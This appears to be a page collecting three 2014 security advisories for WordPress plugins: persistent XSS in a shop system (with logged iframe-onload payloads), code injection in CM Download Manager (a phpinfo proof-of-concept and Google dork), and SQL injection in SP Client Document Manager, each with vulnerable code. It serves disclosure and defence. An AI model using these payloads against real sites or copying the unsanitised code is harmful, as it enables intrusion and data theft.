 _ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1; 
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787115;
 __utmb=182188197.24.10.1414786850]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   POST-Daten:
      setting_shopdata%5Bblogname%5D[%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]%28%22VL%22%29+%3C]
      setting_shopdata%5Bblogdescription%5D[Shop+Slogan+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      shopreg%5Bshoplang%5D[de_DE]
      setting_shopdata%5Bshoplang%5D[de_DE]
      setting_shopdata%5Bshopcategory%5D[]
      setting_shopdata%5Bshopdesc%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      setting_shopdata%5Bshoptags%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      setting_shopdata%5Bemailfooter%5D[]
      setting_shopdata%5Binvoicenote%5D[]
      setting_shopdata%5Bshop_google_analytics_account%5D[]
      setting_shopdata%5Bshop_google_webmastertools_verification_code%5D[]
      setting_shopdata%5Bsubmit%5D[save]
   Response Header:
      Date[Fri, 31 Oct 2014 20:25:22 GMT]
      Server[Apache/2.2.16 (Debian)]
      X-Powered-By[PHP/5.3.3-7+squeeze22]
      p3p[CP="CAO PSA OUR"]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0, no-cache]
      Set-Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1
wp-settings-29002=deleted; expires=Thu, 31-Oct-2013 20:25:22 GMT; path=/
wp-settings-time-29002=1414787123; expires=Sat, 31-Oct-2015 20:25:23 GMT; path=/]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      Connection[close]
      Content-Type[text/html; charset=UTF-8]
--
Status: 200[OK] 
GET https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[PERSISTENT INJECTED SCRIPT CODE!] 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[283] Mime Type[text/html]
   Request Header:
      Host[localhost:80]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
      Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
 __utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
 wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47; 
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
 _ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
 __utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787123; __utmb=182188197.24.10.1414786850]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Date[Fri, 31 Oct 2014 20:25:24 GMT]
      Server[Apache/2.2.16 (Debian)]
      Content-Length[283]
      Keep-Alive[timeout=5, max=8]
      Connection[Keep-Alive]
      Content-Type[text/html; charset=iso-8859-1]
 
 
Reference(s):
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[x]
 
 
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable setting_shopdetail values in the input POST method request.
Restrict the input fields of the tags, blogname and blog slogan to prevent persistent script code injection attacks.
Setup the error exception above to the input mask and reconfigure it to capture the events correctly.
 
 
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopsystem is estimated as medium. (CVSS 3.1)
 
 
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
 
 
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.
 
Domains:    www.vulnerability-lab.com     - www.vuln-lab.com                 - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com   - research@vulnerability-lab.com              - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com  - vulnerability-lab.com/contact.php             - evolution-sec.com/contact
Social:      twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab              - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  - vulnerability-lab.com/rss/rss_upcoming.php       - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php  - vulnerability-lab.com/register/
 
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
 
        Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
 
 
 
 
-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
 
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com

(31)

22Nov/140

WordPress CM Download Manager 2.0.0 Code Injection

Vulnerability title: Code Injection in Wordpress CM Download Manager plugin
CVE: CVE-2014-8877 
Plugin: CM Download Manager plugin
Vendor: CreativeMinds - https://www.cminds.com/
Product: https://wordpress.org/plugins/cm-download-manager/
Affected version: 2.0.0 and previous version
Fixed version: 2.0.4
Google dork: inurl:cmdownloads
Reported by: Phi Le Ngoc - phi.n.le@itas.vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRITION::
 
The code injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker gains full control of the application and the ability to use any operating system functions that are available to the scripting environment. 
 
GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879 
Connection: keep-alive
 
Vulnerable file:/wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadController.php
Vulnerable code: (Line: 130 -> 158)
 
 
public static function alterSearchQuery($search, $query)
    {
        if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) )
        {
            global $wpdb;
            $search_term = $_GET['CMDsearch'];
            if( !empty($search_term) )
            {
                $search = '';
                $query->is_search = true;
                // added slashes screw with quote grouping when done early, so done later
                $search_term = stripslashes($search_term);
                preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches);
                $terms = array_map('_search_terms_tidy', $matches[0]);
 
                $n = '%';
                $searchand = ' AND ';
                foreach((array) $terms as $term)
                {
                    $term = esc_sql(like_escape($term));
                    $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
                }
                add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1);
                remove_filter('posts_request', 'relevanssi_prevent_default_request');
                remove_filter('the_posts', 'relevanssi_query');
            }
        }
        return $search;
}
 
::SOLUTION::
Update to version 2.0.4
 
::DISCLOSURE::
2014-11-08 initial vendor contact
2014-11-10 vendor response
2014-11-10 vendor confirmed 
2014-11-11 vendor release patch
2014-11-14 public disclosure
 
::REFERENCE::
https://downloadsmanager.cminds.com/release-notes/
http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.html?language=en
 
 
::COPYRIGHT::
Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP.
 
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

(94)

22Nov/140

WordPress SP Client Document Manager 2.4.1 SQL Injection

Vulnerability title: Multiple SQL Injection in SP Client Document Manager plugin
Plugin: SP Client Document Manager
Vendor: http://smartypantsplugins.com
Product: https://wordpress.org/plugins/sp-client-document-manager/
Affected version: version 2.4.1 and previous version
Fixed version: N/A
Google dork: inurl:wp-content/plugins/sp-client-document-manager
Reported by: Dang Quoc Thai - thai.q.dang (at) itas (dot) vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRITION::
 
Multiple SQL injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URL and parameter has been confirmed to suffer from SQL injection: 
 
Link 1:
 
POST /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=email-vendor HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/wordpress/?page_id=16
Cookie: wordpress_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7Cc493b6c21a4a1916e2bc6076600939af5276b6feb09d06ecc043c37bd92a0748; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7C7995fe13b1bbe0761cb05258e4e13b20b27cc9cedf3bc337440672353309e8a3; bp-activity-oldestpage=1
Connection: keep-alive
Content-Length: 33
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
vendor_email[]=<SQL Injection>
 
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1516 -> 1530)
    function email_vendor()
    {
        global $wpdb, $current_user;
        if (count($_POST['vendor_email']) == 0) {
            echo '<p style="color:red;font-weight:bold">' . __("Please select at least one file!", "sp-cdm") . '</p>';
        } else {
            $files = implode(",", $_POST['vendor_email']);
            echo "SELECT *  FROM " . $wpdb->prefix . "sp_cu  WHERE id IN (" . $files . ")"."\n";
            $r     = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu  WHERE id IN (" . $files . ")", ARRAY_A);
 
 
 
Link 2: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1462 -> 1479)
 
function download_project()
    {
        global $wpdb, $current_user;
        $user_ID     = $_GET['id'];
        $r           = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu   where pid = $user_ID  order by date desc", ARRAY_A);
        $r_project   = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu_project where id = $user_ID  ", ARRAY_A);
        $return_file = "" . preg_replace('/[^\w\d_ -]/si', '', stripslashes($r_project[0]['name'])) . ".zip";
        $zip         = new Zip();
        $dir         = '' . SP_CDM_UPLOADS_DIR . '' . $r_project[0]['uid'] . '/';
        $path        = '' . SP_CDM_UPLOADS_DIR_URL . '' . $r_project[0]['uid'] . '/';
        //@unlink($dir.$return_file);
        for ($i = 0; $i < count($r); $i++) {
            $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
        }
        $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
        $zip->setZipFile($dir . $return_file);
        header("Location: " . $path . $return_file . "");
    }
 
Link 3: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
 
 
function download_archive()
    {
        global $wpdb, $current_user;
        $user_ID     = $_GET['id'];
        $dir         = '' . SP_CDM_UPLOADS_DIR . '' . $user_ID . '/';
        $path        = '' . SP_CDM_UPLOADS_DIR_URL . '' . $user_ID . '/';
        $return_file = "Account.zip";
        $zip         = new Zip();
        $r           = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu   where uid = $user_ID  order by date desc", ARRAY_A);
        //@unlink($dir.$return_file);
        for ($i = 0; $i < count($r); $i++) {
            $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
        }
        $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
        $zip->setZipFile($dir . $return_file);
        header("Location: " . $path . $return_file . "");
    }
 
Link 4: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 368 -> 372)
 
    function remove_cat()
    {
        global $wpdb, $current_user;
        $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_REQUEST['id'] . "  ");
        $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu WHERE pid = " . $_REQUEST['id'] . "  ");
}  
 
 
::DISCLOSURE::
+ 10/30/2014: Notify to vendor - vendor does not response
+ 11/08/2014: Notify to vendor - Vendor blocks IPs from Vietnam
+ 11/05/2014: Notify to vendor - vendor does not response
+ 11/20/2014: Public information
 
::REFERENCE::
https://www.youtube.com/watch?v=AR3xCcuEJHc
 
 
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

(63)